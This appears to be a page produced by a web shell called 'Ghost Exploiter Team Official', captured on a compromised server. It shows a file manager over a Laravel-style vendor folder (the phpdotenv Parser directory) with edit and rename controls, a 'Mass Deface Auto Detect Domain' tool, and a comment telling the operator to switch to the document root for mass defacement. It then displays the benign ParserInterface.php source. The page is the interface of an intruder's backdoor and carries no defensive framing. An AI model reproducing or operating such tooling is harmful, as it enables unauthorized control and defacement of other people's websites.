Ghost Exploiter Team Official
Mass Deface
Directory >>
/
var
/
www
/
html
/
back
/
vendor
/
vlucas
/
phpdotenv
/
src
/
Parser
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
type
file
dir
+File/Dir
Entry.php
0.991KB
edt
ren
EntryParser.php
12.18KB
edt
ren
Lexer.php
1.242KB
edt
ren
Lines.php
3.074KB
edt
ren
Parser.php
1.708KB
edt
ren
ParserInterface.php
0.326KB
edt
ren
Value.php
1.551KB
edt
ren
<?php declare(strict_types=1); namespace Dotenv\Parser; interface ParserInterface { /** * Parse content into an entry array. * * @param string $content * * @throws \Dotenv\Exception\InvalidFileException * * @return \Dotenv\Parser\Entry[] */ public function parse(string $content); }